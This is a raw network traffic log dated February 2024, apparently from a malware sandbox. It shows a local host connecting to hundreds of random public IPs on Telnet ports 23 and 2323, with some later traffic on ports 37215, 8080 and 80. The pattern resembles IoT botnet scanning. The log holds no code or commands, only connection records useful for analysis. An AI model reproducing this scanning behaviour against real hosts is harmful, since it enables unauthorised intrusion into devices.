Feb 14, 2024 09:28:46.426683903 CET	1184	23	192.168.2.15	158.217.221.222
Feb 14, 2024 09:28:46.426687002 CET	1184	23	192.168.2.15	44.238.214.26
Feb 14, 2024 09:28:46.426691055 CET	1184	23	192.168.2.15	149.154.206.88
Feb 14, 2024 09:28:46.426691055 CET	1184	23	192.168.2.15	121.142.200.102
Feb 14, 2024 09:28:46.426691055 CET	1184	23	192.168.2.15	12.5.76.236
Feb 14, 2024 09:28:46.426697016 CET	1184	23	192.168.2.15	70.132.110.13
Feb 14, 2024 09:28:46.426704884 CET	1184	23	192.168.2.15	96.141.131.208
Feb 14, 2024 09:28:46.426704884 CET	1184	23	192.168.2.15	31.103.140.241
Feb 14, 2024 09:28:46.426706076 CET	1184	2323	192.168.2.15	96.9.152.203
Feb 14, 2024 09:28:46.426704884 CET	1184	23	192.168.2.15	181.69.131.52
Feb 14, 2024 09:28:46.426704884 CET	1184	23	192.168.2.15	159.149.183.151
Feb 14, 2024 09:28:46.426704884 CET	1184	23	192.168.2.15	95.149.153.72
Feb 14, 2024 09:28:46.426704884 CET	1184	23	192.168.2.15	106.6.220.89
Feb 14, 2024 09:28:46.426704884 CET	1184	23	192.168.2.15	219.86.13.226
Feb 14, 2024 09:28:46.426709890 CET	1184	2323	192.168.2.15	211.58.14.211
Feb 14, 2024 09:28:46.426713943 CET	1184	23	192.168.2.15	175.4.114.65
Feb 14, 2024 09:28:46.426717043 CET	1184	23	192.168.2.15	111.120.234.48
Feb 14, 2024 09:28:46.426733017 CET	1184	23	192.168.2.15	70.174.188.245
Feb 14, 2024 09:28:46.426798105 CET	1184	23	192.168.2.15	194.189.203.102
Feb 14, 2024 09:28:46.426803112 CET	1184	23	192.168.2.15	60.180.178.119
Feb 14, 2024 09:28:46.426803112 CET	1184	23	192.168.2.15	95.105.43.61
Feb 14, 2024 09:28:46.426804066 CET	1184	23	192.168.2.15	183.82.236.222
Feb 14, 2024 09:28:46.426804066 CET	1184	23	192.168.2.15	86.186.199.176
Feb 14, 2024 09:28:46.426804066 CET	1184	23	192.168.2.15	35.220.215.191
Feb 14, 2024 09:28:46.426804066 CET	1184	2323	192.168.2.15	53.230.173.145
Feb 14, 2024 09:28:46.426805973 CET	1184	23	192.168.2.15	221.79.168.68
Feb 14, 2024 09:28:46.426805019 CET	1184	23	192.168.2.15	141.31.38.10
Feb 14, 2024 09:28:46.426805973 CET	1184	2323	192.168.2.15	154.16.156.7
Feb 14, 2024 09:28:46.426806927 CET	1184	2323	192.168.2.15	100.230.141.144
Feb 14, 2024 09:28:46.426805973 CET	1184	23	192.168.2.15	121.58.239.73
Feb 14, 2024 09:28:46.426806927 CET	1184	23	192.168.2.15	137.60.79.224
Feb 14, 2024 09:28:46.426806927 CET	1184	23	192.168.2.15	38.25.190.174
Feb 14, 2024 09:28:46.426830053 CET	1184	23	192.168.2.15	158.237.171.223
Feb 14, 2024 09:28:46.426830053 CET	1184	23	192.168.2.15	192.198.209.169
Feb 14, 2024 09:28:46.426830053 CET	1184	23	192.168.2.15	8.7.79.118
Feb 14, 2024 09:28:46.426830053 CET	1184	23	192.168.2.15	91.1.74.91
Feb 14, 2024 09:28:46.426830053 CET	1184	23	192.168.2.15	193.75.114.118
Feb 14, 2024 09:28:46.426830053 CET	1184	23	192.168.2.15	130.229.220.202
Feb 14, 2024 09:28:46.426830053 CET	1184	23	192.168.2.15	113.213.127.212
Feb 14, 2024 09:28:46.426831961 CET	1184	23	192.168.2.15	141.145.32.119
Feb 14, 2024 09:28:46.426831961 CET	1184	23	192.168.2.15	118.6.209.64
Feb 14, 2024 09:28:46.426831961 CET	1184	23	192.168.2.15	181.45.231.99
Feb 14, 2024 09:28:46.426831961 CET	1184	23	192.168.2.15	208.243.160.117
Feb 14, 2024 09:28:46.426836014 CET	1184	23	192.168.2.15	79.145.3.13
Feb 14, 2024 09:28:46.426836014 CET	1184	23	192.168.2.15	14.57.242.17
Feb 14, 2024 09:28:46.426836014 CET	1184	2323	192.168.2.15	119.53.88.80
Feb 14, 2024 09:28:46.426845074 CET	1184	23	192.168.2.15	34.208.215.175
Feb 14, 2024 09:28:46.426846027 CET	1184	23	192.168.2.15	31.189.58.157
Feb 14, 2024 09:28:46.426846027 CET	1184	23	192.168.2.15	137.7.54.36
Feb 14, 2024 09:28:46.426848888 CET	1184	23	192.168.2.15	95.239.39.128
Feb 14, 2024 09:28:46.426848888 CET	1184	23	192.168.2.15	154.193.94.61
Feb 14, 2024 09:28:46.426851988 CET	1184	23	192.168.2.15	39.43.161.45
Feb 14, 2024 09:28:46.426851988 CET	1184	23	192.168.2.15	122.241.209.165
Feb 14, 2024 09:28:46.426861048 CET	1184	23	192.168.2.15	93.137.228.231
Feb 14, 2024 09:28:46.426861048 CET	1184	2323	192.168.2.15	155.171.10.79
Feb 14, 2024 09:28:46.426861048 CET	1184	23	192.168.2.15	204.48.72.231
Feb 14, 2024 09:28:46.426865101 CET	1184	23	192.168.2.15	110.99.60.62
Feb 14, 2024 09:28:46.426865101 CET	1184	23	192.168.2.15	27.131.222.27
Feb 14, 2024 09:28:46.426865101 CET	1184	23	192.168.2.15	107.201.25.216
Feb 14, 2024 09:28:46.426865101 CET	1184	23	192.168.2.15	219.96.231.13
Feb 14, 2024 09:28:46.426865101 CET	1184	23	192.168.2.15	116.139.203.88
Feb 14, 2024 09:28:46.426865101 CET	1184	23	192.168.2.15	93.40.109.9
Feb 14, 2024 09:28:46.426876068 CET	1184	23	192.168.2.15	143.64.152.49
Feb 14, 2024 09:28:46.426876068 CET	1184	23	192.168.2.15	193.116.254.124
Feb 14, 2024 09:28:46.426877022 CET	1184	23	192.168.2.15	83.196.74.19
Feb 14, 2024 09:28:46.426877022 CET	1184	2323	192.168.2.15	1.112.225.12
Feb 14, 2024 09:28:46.426879883 CET	1184	23	192.168.2.15	206.139.15.172
Feb 14, 2024 09:28:46.426892996 CET	1184	23	192.168.2.15	86.66.219.78
Feb 14, 2024 09:28:46.426899910 CET	1184	23	192.168.2.15	202.255.22.166
Feb 14, 2024 09:28:46.426899910 CET	1184	23	192.168.2.15	149.72.147.98
Feb 14, 2024 09:28:46.426917076 CET	1184	23	192.168.2.15	53.147.252.1
Feb 14, 2024 09:28:46.426918983 CET	1184	23	192.168.2.15	18.23.95.101
Feb 14, 2024 09:28:46.426919937 CET	1184	23	192.168.2.15	202.216.64.85
Feb 14, 2024 09:28:46.426918983 CET	1184	23	192.168.2.15	128.138.174.30
Feb 14, 2024 09:28:46.426939011 CET	1184	23	192.168.2.15	163.8.220.106
Feb 14, 2024 09:28:46.426939011 CET	1184	2323	192.168.2.15	114.226.169.86
Feb 14, 2024 09:28:46.426918983 CET	1184	23	192.168.2.15	84.146.246.237
Feb 14, 2024 09:28:46.426918983 CET	1184	23	192.168.2.15	1.24.212.105
Feb 14, 2024 09:28:46.426918983 CET	1184	23	192.168.2.15	62.128.0.43
Feb 14, 2024 09:28:46.426918983 CET	1184	23	192.168.2.15	151.235.180.253
Feb 14, 2024 09:28:46.426918983 CET	1184	23	192.168.2.15	63.244.177.175
Feb 14, 2024 09:28:46.426918983 CET	1184	23	192.168.2.15	141.20.77.144
Feb 14, 2024 09:28:46.426918983 CET	1184	23	192.168.2.15	138.61.206.211
Feb 14, 2024 09:28:46.426959038 CET	1184	23	192.168.2.15	126.64.130.23
Feb 14, 2024 09:28:46.426964045 CET	1184	23	192.168.2.15	1.28.253.14
Feb 14, 2024 09:28:46.426981926 CET	1184	23	192.168.2.15	164.50.65.240
Feb 14, 2024 09:28:46.426983118 CET	1184	23	192.168.2.15	193.26.166.190
Feb 14, 2024 09:28:46.427011013 CET	1184	23	192.168.2.15	81.119.177.177
Feb 14, 2024 09:28:46.427031994 CET	1184	23	192.168.2.15	67.9.77.78
Feb 14, 2024 09:28:46.427078009 CET	1184	23	192.168.2.15	47.239.163.185
Feb 14, 2024 09:28:46.427078009 CET	1184	2323	192.168.2.15	158.243.13.30
Feb 14, 2024 09:28:46.427078009 CET	1184	23	192.168.2.15	208.32.92.153
Feb 14, 2024 09:28:46.427083015 CET	1184	23	192.168.2.15	18.133.202.144
Feb 14, 2024 09:28:46.427083015 CET	1184	23	192.168.2.15	198.20.243.71
Feb 14, 2024 09:28:46.427086115 CET	1184	2323	192.168.2.15	24.159.104.197
Feb 14, 2024 09:28:46.427086115 CET	1184	2323	192.168.2.15	206.244.121.131
Feb 14, 2024 09:28:46.427086115 CET	1184	23	192.168.2.15	187.4.80.80
Feb 14, 2024 09:28:46.427086115 CET	1184	23	192.168.2.15	132.145.121.30
Feb 14, 2024 09:28:46.427087069 CET	1184	23	192.168.2.15	61.147.202.27
Feb 14, 2024 09:28:46.427089930 CET	1184	23	192.168.2.15	177.48.246.223
Feb 14, 2024 09:28:46.427089930 CET	1184	23	192.168.2.15	153.249.178.247
Feb 14, 2024 09:28:46.427089930 CET	1184	23	192.168.2.15	42.109.193.61
Feb 14, 2024 09:28:46.427089930 CET	1184	23	192.168.2.15	2.253.99.243
Feb 14, 2024 09:28:46.427089930 CET	1184	23	192.168.2.15	133.43.162.14
Feb 14, 2024 09:28:46.427107096 CET	1184	23	192.168.2.15	90.59.5.140
Feb 14, 2024 09:28:46.427107096 CET	1184	23	192.168.2.15	9.27.128.67
Feb 14, 2024 09:28:46.427107096 CET	1184	2323	192.168.2.15	166.65.145.146
Feb 14, 2024 09:28:46.427107096 CET	1184	23	192.168.2.15	4.106.242.152
Feb 14, 2024 09:28:46.427110910 CET	1184	23	192.168.2.15	135.74.145.210
Feb 14, 2024 09:28:46.427110910 CET	1184	23	192.168.2.15	152.140.247.108
Feb 14, 2024 09:28:46.427113056 CET	1184	23	192.168.2.15	148.15.252.11
Feb 14, 2024 09:28:46.427110910 CET	1184	23	192.168.2.15	42.48.221.133
Feb 14, 2024 09:28:46.427113056 CET	1184	23	192.168.2.15	69.142.44.89
Feb 14, 2024 09:28:46.427113056 CET	1184	23	192.168.2.15	74.84.77.16
Feb 14, 2024 09:28:46.427113056 CET	1184	23	192.168.2.15	8.217.19.50
Feb 14, 2024 09:28:46.427114010 CET	1184	23	192.168.2.15	162.132.191.144
Feb 14, 2024 09:28:46.427113056 CET	1184	23	192.168.2.15	42.160.122.73
Feb 14, 2024 09:28:46.427110910 CET	1184	23	192.168.2.15	202.248.26.227
Feb 14, 2024 09:28:46.427113056 CET	1184	23	192.168.2.15	139.214.133.193
Feb 14, 2024 09:28:46.427115917 CET	1184	23	192.168.2.15	130.101.30.189
Feb 14, 2024 09:28:46.427114010 CET	1184	23	192.168.2.15	87.21.3.123
Feb 14, 2024 09:28:46.427110910 CET	1184	23	192.168.2.15	31.112.222.250
Feb 14, 2024 09:28:46.427115917 CET	1184	23	192.168.2.15	154.206.181.177
Feb 14, 2024 09:28:46.427115917 CET	1184	23	192.168.2.15	165.19.44.40
Feb 14, 2024 09:28:46.427115917 CET	1184	23	192.168.2.15	72.121.219.160
Feb 14, 2024 09:28:46.427115917 CET	1184	23	192.168.2.15	88.111.81.179
Feb 14, 2024 09:28:46.427130938 CET	1184	23	192.168.2.15	163.102.107.247
Feb 14, 2024 09:28:46.427130938 CET	1184	23	192.168.2.15	143.186.67.184
Feb 14, 2024 09:28:46.427130938 CET	1184	23	192.168.2.15	169.213.157.40
Feb 14, 2024 09:28:46.427130938 CET	1184	23	192.168.2.15	27.149.157.4
Feb 14, 2024 09:28:46.427134991 CET	1184	23	192.168.2.15	18.79.63.149
Feb 14, 2024 09:28:46.427134991 CET	1184	23	192.168.2.15	109.157.194.205
Feb 14, 2024 09:28:46.427134991 CET	1184	23	192.168.2.15	203.44.216.222
Feb 14, 2024 09:28:46.427134991 CET	1184	23	192.168.2.15	137.15.190.0
Feb 14, 2024 09:28:46.427162886 CET	1184	23	192.168.2.15	159.14.255.104
Feb 14, 2024 09:28:46.427165031 CET	1184	23	192.168.2.15	12.80.212.185
Feb 14, 2024 09:28:46.427165031 CET	1184	23	192.168.2.15	41.103.186.240
Feb 14, 2024 09:28:46.427165031 CET	1184	23	192.168.2.15	72.138.78.254
Feb 14, 2024 09:28:46.427165031 CET	1184	23	192.168.2.15	202.197.208.1
Feb 14, 2024 09:28:46.427165031 CET	1184	23	192.168.2.15	200.53.22.82
Feb 14, 2024 09:28:46.427165031 CET	1184	23	192.168.2.15	1.111.2.208
Feb 14, 2024 09:28:46.427167892 CET	1184	23	192.168.2.15	76.112.149.95
Feb 14, 2024 09:28:46.427165031 CET	1184	23	192.168.2.15	157.178.77.86
Feb 14, 2024 09:28:46.427165031 CET	1184	23	192.168.2.15	53.175.114.199
Feb 14, 2024 09:28:46.427172899 CET	1184	23	192.168.2.15	90.39.38.252
Feb 14, 2024 09:28:46.427172899 CET	1184	23	192.168.2.15	197.39.88.188
Feb 14, 2024 09:28:46.427172899 CET	1184	23	192.168.2.15	202.35.21.130
Feb 14, 2024 09:28:46.427172899 CET	1184	23	192.168.2.15	111.82.227.167
Feb 14, 2024 09:28:46.427184105 CET	1184	2323	192.168.2.15	76.58.234.147
Feb 14, 2024 09:28:46.427184105 CET	1184	23	192.168.2.15	36.26.81.45
Feb 14, 2024 09:28:46.427184105 CET	1184	23	192.168.2.15	151.218.18.114
Feb 14, 2024 09:28:46.427184105 CET	1184	23	192.168.2.15	126.45.73.197
Feb 14, 2024 09:28:46.427184105 CET	1184	23	192.168.2.15	158.189.69.107
Feb 14, 2024 09:28:46.427190065 CET	1184	2323	192.168.2.15	216.49.7.78
Feb 14, 2024 09:28:46.427197933 CET	1184	23	192.168.2.15	185.151.255.56
Feb 14, 2024 09:28:46.427197933 CET	1184	23	192.168.2.15	42.246.230.74
Feb 14, 2024 09:28:46.427216053 CET	1184	23	192.168.2.15	150.160.34.101
Feb 14, 2024 09:28:46.427217960 CET	1184	23	192.168.2.15	167.47.253.178
Feb 14, 2024 09:28:46.427233934 CET	1184	23	192.168.2.15	51.52.60.241
Feb 14, 2024 09:28:46.427233934 CET	1184	23	192.168.2.15	199.224.88.240
Feb 14, 2024 09:28:46.427249908 CET	1184	2323	192.168.2.15	85.40.217.129
Feb 14, 2024 09:28:46.427251101 CET	1184	23	192.168.2.15	195.169.204.41
Feb 14, 2024 09:28:46.427267075 CET	1184	23	192.168.2.15	186.50.58.135
Feb 14, 2024 09:28:46.427267075 CET	1184	23	192.168.2.15	195.160.111.126
Feb 14, 2024 09:28:46.427282095 CET	1184	23	192.168.2.15	64.49.32.22
Feb 14, 2024 09:28:46.427282095 CET	1184	23	192.168.2.15	36.186.245.83
Feb 14, 2024 09:28:46.427290916 CET	1184	23	192.168.2.15	89.247.21.80
Feb 14, 2024 09:28:46.427298069 CET	1184	23	192.168.2.15	202.22.158.243
Feb 14, 2024 09:28:46.427306890 CET	1184	23	192.168.2.15	217.146.130.206
Feb 14, 2024 09:28:46.427314043 CET	1184	2323	192.168.2.15	182.147.60.125
Feb 14, 2024 09:28:46.427314997 CET	1184	23	192.168.2.15	52.92.19.170
Feb 14, 2024 09:28:46.427333117 CET	1184	23	192.168.2.15	130.222.184.94
Feb 14, 2024 09:28:46.427361965 CET	1184	23	192.168.2.15	150.21.133.164
Feb 14, 2024 09:28:46.427361965 CET	1184	23	192.168.2.15	40.78.77.198
Feb 14, 2024 09:28:46.427361965 CET	1184	2323	192.168.2.15	75.247.208.8
Feb 14, 2024 09:28:46.427361965 CET	1184	23	192.168.2.15	161.197.120.187
Feb 14, 2024 09:28:46.427422047 CET	1184	2323	192.168.2.15	37.198.227.168
Feb 14, 2024 09:28:46.427422047 CET	1184	23	192.168.2.15	142.75.42.125
Feb 14, 2024 09:28:46.427422047 CET	1184	23	192.168.2.15	160.98.249.18
Feb 14, 2024 09:28:46.427422047 CET	1184	23	192.168.2.15	95.167.9.192
Feb 14, 2024 09:28:46.427422047 CET	1184	23	192.168.2.15	50.63.186.185
Feb 14, 2024 09:28:46.427424908 CET	1184	23	192.168.2.15	206.71.1.40
Feb 14, 2024 09:28:46.427428961 CET	1184	23	192.168.2.15	5.138.57.174
Feb 14, 2024 09:28:46.427428961 CET	1184	23	192.168.2.15	204.37.199.32
Feb 14, 2024 09:28:46.427429914 CET	1184	23	192.168.2.15	194.102.8.249
Feb 14, 2024 09:28:46.427428961 CET	1184	23	192.168.2.15	120.178.127.177
Feb 14, 2024 09:28:46.427424908 CET	1184	23	192.168.2.15	106.52.140.46
Feb 14, 2024 09:28:46.427428961 CET	1184	23	192.168.2.15	103.151.213.101
Feb 14, 2024 09:28:46.427428961 CET	1184	23	192.168.2.15	37.24.54.28
Feb 14, 2024 09:28:46.427433968 CET	1184	23	192.168.2.15	167.45.214.180
Feb 14, 2024 09:28:46.427434921 CET	1184	23	192.168.2.15	65.87.51.218
Feb 14, 2024 09:28:46.427428961 CET	1184	23	192.168.2.15	70.134.246.94
Feb 14, 2024 09:28:46.427424908 CET	1184	23	192.168.2.15	31.35.12.168
Feb 14, 2024 09:28:46.427428961 CET	1184	23	192.168.2.15	46.48.100.209
Feb 14, 2024 09:28:46.427424908 CET	1184	23	192.168.2.15	107.23.58.224
Feb 14, 2024 09:28:46.427428961 CET	1184	23	192.168.2.15	179.114.212.212
Feb 14, 2024 09:28:46.427424908 CET	1184	23	192.168.2.15	17.98.73.66
Feb 14, 2024 09:28:46.427424908 CET	1184	23	192.168.2.15	53.177.148.33
Feb 14, 2024 09:28:46.427445889 CET	1184	23	192.168.2.15	120.93.50.152
Feb 14, 2024 09:28:46.427445889 CET	1184	23	192.168.2.15	100.22.108.116
Feb 14, 2024 09:28:46.427445889 CET	1184	23	192.168.2.15	171.18.121.149
Feb 14, 2024 09:28:46.427445889 CET	1184	23	192.168.2.15	85.62.193.209
Feb 14, 2024 09:28:46.427457094 CET	1184	23	192.168.2.15	75.131.135.163
Feb 14, 2024 09:28:46.427457094 CET	1184	23	192.168.2.15	126.112.1.59
Feb 14, 2024 09:28:46.427457094 CET	1184	23	192.168.2.15	32.129.223.222
Feb 14, 2024 09:28:46.427457094 CET	1184	23	192.168.2.15	44.234.63.118
Feb 14, 2024 09:28:46.427457094 CET	1184	23	192.168.2.15	163.157.113.0
Feb 14, 2024 09:28:46.427457094 CET	1184	2323	192.168.2.15	44.195.215.96
Feb 14, 2024 09:28:46.427473068 CET	1184	23	192.168.2.15	2.36.98.87
Feb 14, 2024 09:28:46.427478075 CET	1184	23	192.168.2.15	62.13.157.93
Feb 14, 2024 09:28:46.427488089 CET	1184	2323	192.168.2.15	19.65.115.249
Feb 14, 2024 09:28:46.427488089 CET	1184	23	192.168.2.15	14.116.80.62
Feb 14, 2024 09:28:46.427489996 CET	1184	2323	192.168.2.15	39.118.53.198
Feb 14, 2024 09:28:46.427493095 CET	1184	23	192.168.2.15	62.20.240.133
Feb 14, 2024 09:28:46.427500963 CET	1184	23	192.168.2.15	97.5.204.171
Feb 14, 2024 09:28:46.427501917 CET	1184	23	192.168.2.15	104.150.141.216
Feb 14, 2024 09:28:46.427501917 CET	1184	23	192.168.2.15	190.67.204.120
Feb 14, 2024 09:28:46.427501917 CET	1184	23	192.168.2.15	81.123.82.216
Feb 14, 2024 09:28:46.427511930 CET	1184	23	192.168.2.15	150.191.190.224
Feb 14, 2024 09:28:46.427511930 CET	1184	23	192.168.2.15	131.139.217.13
Feb 14, 2024 09:28:46.427525043 CET	1184	23	192.168.2.15	169.140.31.133
Feb 14, 2024 09:28:46.427539110 CET	1184	23	192.168.2.15	176.29.222.168
Feb 14, 2024 09:28:46.427545071 CET	1184	2323	192.168.2.15	46.46.201.100
Feb 14, 2024 09:28:46.427546978 CET	1184	23	192.168.2.15	100.170.198.88
Feb 14, 2024 09:28:46.427550077 CET	1184	23	192.168.2.15	222.223.107.204
Feb 14, 2024 09:28:46.427561045 CET	1184	23	192.168.2.15	182.147.193.227
Feb 14, 2024 09:28:46.427566051 CET	1184	23	192.168.2.15	96.217.202.78
Feb 14, 2024 09:28:46.427568913 CET	1184	23	192.168.2.15	137.248.200.230
Feb 14, 2024 09:28:46.427592993 CET	1184	23	192.168.2.15	43.250.217.42
Feb 14, 2024 09:28:46.427599907 CET	1184	2323	192.168.2.15	85.156.113.114
Feb 14, 2024 09:28:46.427608013 CET	1184	23	192.168.2.15	78.78.136.4
Feb 14, 2024 09:28:46.427611113 CET	1184	23	192.168.2.15	172.73.120.151
Feb 14, 2024 09:28:46.427625895 CET	1184	23	192.168.2.15	140.7.174.217
Feb 14, 2024 09:28:46.427639008 CET	1184	23	192.168.2.15	210.44.219.173
Feb 14, 2024 09:28:46.427639008 CET	1184	23	192.168.2.15	141.12.87.2
Feb 14, 2024 09:28:46.427639961 CET	1184	23	192.168.2.15	171.173.198.73
Feb 14, 2024 09:28:46.427639961 CET	1184	23	192.168.2.15	43.82.196.74
Feb 14, 2024 09:28:46.427639961 CET	1184	23	192.168.2.15	166.171.74.152
Feb 14, 2024 09:28:46.427643061 CET	1184	23	192.168.2.15	205.20.100.234
Feb 14, 2024 09:28:46.427654028 CET	1184	23	192.168.2.15	122.216.126.81
Feb 14, 2024 09:28:46.427659988 CET	1184	23	192.168.2.15	78.150.235.238
Feb 14, 2024 09:28:46.427671909 CET	1184	23	192.168.2.15	181.146.93.108
Feb 14, 2024 09:28:46.427676916 CET	1184	2323	192.168.2.15	181.63.160.21
Feb 14, 2024 09:28:46.427686930 CET	1184	23	192.168.2.15	41.103.8.250
Feb 14, 2024 09:28:46.427689075 CET	1184	23	192.168.2.15	112.223.223.113
Feb 14, 2024 09:28:46.427696943 CET	1184	23	192.168.2.15	62.130.18.210
Feb 14, 2024 09:28:46.427700043 CET	1184	23	192.168.2.15	89.163.53.136
Feb 14, 2024 09:28:46.427717924 CET	1184	23	192.168.2.15	17.45.193.24
Feb 14, 2024 09:28:46.427717924 CET	1184	23	192.168.2.15	37.161.91.187
Feb 14, 2024 09:28:46.427751064 CET	1184	23	192.168.2.15	106.83.193.210
Feb 14, 2024 09:28:46.427752018 CET	1184	23	192.168.2.15	13.140.60.188
Feb 14, 2024 09:28:46.427751064 CET	1184	23	192.168.2.15	156.170.213.7
Feb 14, 2024 09:28:46.427751064 CET	1184	2323	192.168.2.15	38.69.10.115
Feb 14, 2024 09:28:46.427786112 CET	1184	23	192.168.2.15	179.171.148.206
Feb 14, 2024 09:28:46.427786112 CET	1184	23	192.168.2.15	125.36.96.67
Feb 14, 2024 09:28:46.427786112 CET	1184	23	192.168.2.15	134.51.12.112
Feb 14, 2024 09:28:46.427787066 CET	1184	23	192.168.2.15	100.127.169.13
Feb 14, 2024 09:28:46.427788019 CET	1184	23	192.168.2.15	114.78.184.113
Feb 14, 2024 09:28:46.427804947 CET	1184	23	192.168.2.15	83.61.165.34
Feb 14, 2024 09:28:46.427812099 CET	1184	23	192.168.2.15	157.218.197.63
Feb 14, 2024 09:28:46.427824020 CET	1184	23	192.168.2.15	164.45.71.196
Feb 14, 2024 09:28:46.427828074 CET	1184	23	192.168.2.15	37.13.168.167
Feb 14, 2024 09:28:46.427845001 CET	1184	23	192.168.2.15	137.220.43.139
Feb 14, 2024 09:28:46.427853107 CET	1184	2323	192.168.2.15	130.217.112.183
Feb 14, 2024 09:28:46.427854061 CET	1184	23	192.168.2.15	9.100.223.207
Feb 14, 2024 09:28:46.427860975 CET	1184	23	192.168.2.15	119.114.24.149
Feb 14, 2024 09:28:46.427860975 CET	1184	23	192.168.2.15	80.41.190.20
Feb 14, 2024 09:28:46.427881956 CET	1184	23	192.168.2.15	158.92.82.148
Feb 14, 2024 09:28:46.427891016 CET	1184	23	192.168.2.15	102.90.117.0
Feb 14, 2024 09:28:46.427895069 CET	1184	23	192.168.2.15	192.1.146.21
Feb 14, 2024 09:28:46.427911043 CET	1184	23	192.168.2.15	43.104.69.194
Feb 14, 2024 09:28:46.427910089 CET	1184	2323	192.168.2.15	100.41.146.13
Feb 14, 2024 09:28:46.427922010 CET	1184	23	192.168.2.15	37.238.196.14
Feb 14, 2024 09:28:46.427947998 CET	1184	23	192.168.2.15	145.32.217.176
Feb 14, 2024 09:28:46.427947998 CET	1184	23	192.168.2.15	24.171.91.250
Feb 14, 2024 09:28:46.427951097 CET	1184	23	192.168.2.15	99.245.19.200
Feb 14, 2024 09:28:46.427951097 CET	1184	23	192.168.2.15	95.16.231.204
Feb 14, 2024 09:28:46.427964926 CET	1184	2323	192.168.2.15	178.124.230.199
Feb 14, 2024 09:28:46.427978992 CET	1184	23	192.168.2.15	95.217.141.176
Feb 14, 2024 09:28:46.427979946 CET	1184	23	192.168.2.15	199.77.124.191
Feb 14, 2024 09:28:46.427998066 CET	1184	23	192.168.2.15	206.172.182.43
Feb 14, 2024 09:28:46.427999020 CET	1184	23	192.168.2.15	155.5.170.63
Feb 14, 2024 09:28:46.428002119 CET	1184	23	192.168.2.15	110.160.58.204
Feb 14, 2024 09:28:46.428002119 CET	1184	23	192.168.2.15	223.146.115.214
Feb 14, 2024 09:28:46.428002119 CET	1184	23	192.168.2.15	5.151.42.40
Feb 14, 2024 09:28:46.428003073 CET	1184	23	192.168.2.15	89.1.115.139
Feb 14, 2024 09:28:46.428003073 CET	1184	23	192.168.2.15	67.206.238.188
Feb 14, 2024 09:28:46.428018093 CET	1184	23	192.168.2.15	211.3.158.12
Feb 14, 2024 09:28:46.428003073 CET	1184	23	192.168.2.15	81.15.218.170
Feb 14, 2024 09:28:46.428037882 CET	1184	23	192.168.2.15	68.97.49.21
Feb 14, 2024 09:28:46.428046942 CET	1184	23	192.168.2.15	8.6.215.205
Feb 14, 2024 09:28:46.428052902 CET	1184	2323	192.168.2.15	173.118.27.223
Feb 14, 2024 09:28:46.428071022 CET	1184	23	192.168.2.15	128.145.164.196
Feb 14, 2024 09:28:46.428091049 CET	1184	23	192.168.2.15	172.111.23.117
Feb 14, 2024 09:28:46.428092957 CET	1184	23	192.168.2.15	217.202.197.205
Feb 14, 2024 09:28:46.428105116 CET	1184	23	192.168.2.15	52.253.198.99
Feb 14, 2024 09:28:46.428108931 CET	1184	23	192.168.2.15	79.116.90.255
Feb 14, 2024 09:28:46.428112984 CET	1184	23	192.168.2.15	82.165.11.168
Feb 14, 2024 09:28:46.428108931 CET	1184	2323	192.168.2.15	209.141.172.9
Feb 14, 2024 09:28:46.428112984 CET	1184	23	192.168.2.15	197.220.80.231
Feb 14, 2024 09:28:46.428129911 CET	1184	23	192.168.2.15	75.121.174.248
Feb 14, 2024 09:28:46.428129911 CET	1184	23	192.168.2.15	86.218.34.127
Feb 14, 2024 09:28:46.428152084 CET	1184	23	192.168.2.15	74.187.145.0
Feb 14, 2024 09:28:46.428152084 CET	1184	23	192.168.2.15	23.12.15.57
Feb 14, 2024 09:28:46.428159952 CET	1184	23	192.168.2.15	177.249.64.143
Feb 14, 2024 09:28:46.428159952 CET	1184	23	192.168.2.15	57.120.30.134
Feb 14, 2024 09:28:46.428159952 CET	1184	23	192.168.2.15	8.174.169.36
Feb 14, 2024 09:28:46.504175901 CET	8080	6752	95.178.11.115	192.168.2.15
Feb 14, 2024 09:28:46.560044050 CET	37215	8096	41.47.17.47	192.168.2.15
Feb 14, 2024 09:28:46.560148001 CET	37215	8096	41.238.171.241	192.168.2.15
Feb 14, 2024 09:28:46.574757099 CET	8080	6752	31.220.4.214	192.168.2.15
Feb 14, 2024 09:28:46.580239058 CET	80	58378	88.221.78.210	192.168.2.15
Feb 14, 2024 09:28:46.581208944 CET	23	1184	177.249.64.143	192.168.2.15
Feb 14, 2024 09:28:46.581326962 CET	58378	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:46.581700087 CET	58378	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:46.581760883 CET	58378	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:46.581907988 CET	58390	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:46.590318918 CET	80	56704	88.149.181.115	192.168.2.15
Feb 14, 2024 09:28:46.591603041 CET	56704	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:46.591603041 CET	56704	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:46.591638088 CET	56704	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:46.591643095 CET	56716	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:46.591665030 CET	80	53226	88.119.167.115	192.168.2.15
Feb 14, 2024 09:28:46.591782093 CET	53226	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:46.591804028 CET	53226	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:46.591818094 CET	53226	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:46.591856003 CET	53238	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:46.603331089 CET	8080	6752	94.26.240.178	192.168.2.15
Feb 14, 2024 09:28:46.608731985 CET	8080	6752	62.2.181.0	192.168.2.15
Feb 14, 2024 09:28:46.610060930 CET	8080	6752	95.61.90.83	192.168.2.15
Feb 14, 2024 09:28:46.610191107 CET	8080	6752	31.136.153.210	192.168.2.15
Feb 14, 2024 09:28:46.610486031 CET	6752	8080	192.168.2.15	31.136.153.210
Feb 14, 2024 09:28:46.611717939 CET	8080	6752	62.83.92.40	192.168.2.15
Feb 14, 2024 09:28:46.612622023 CET	8080	6752	95.196.189.141	192.168.2.15
Feb 14, 2024 09:28:46.613919973 CET	8080	6752	95.63.60.106	192.168.2.15
Feb 14, 2024 09:28:46.619726896 CET	37215	8096	41.220.108.111	192.168.2.15
Feb 14, 2024 09:28:46.621393919 CET	37215	8096	41.75.108.102	192.168.2.15
Feb 14, 2024 09:28:46.625458002 CET	23	1184	5.151.42.40	192.168.2.15
Feb 14, 2024 09:28:46.626925945 CET	8080	6752	31.32.1.130	192.168.2.15
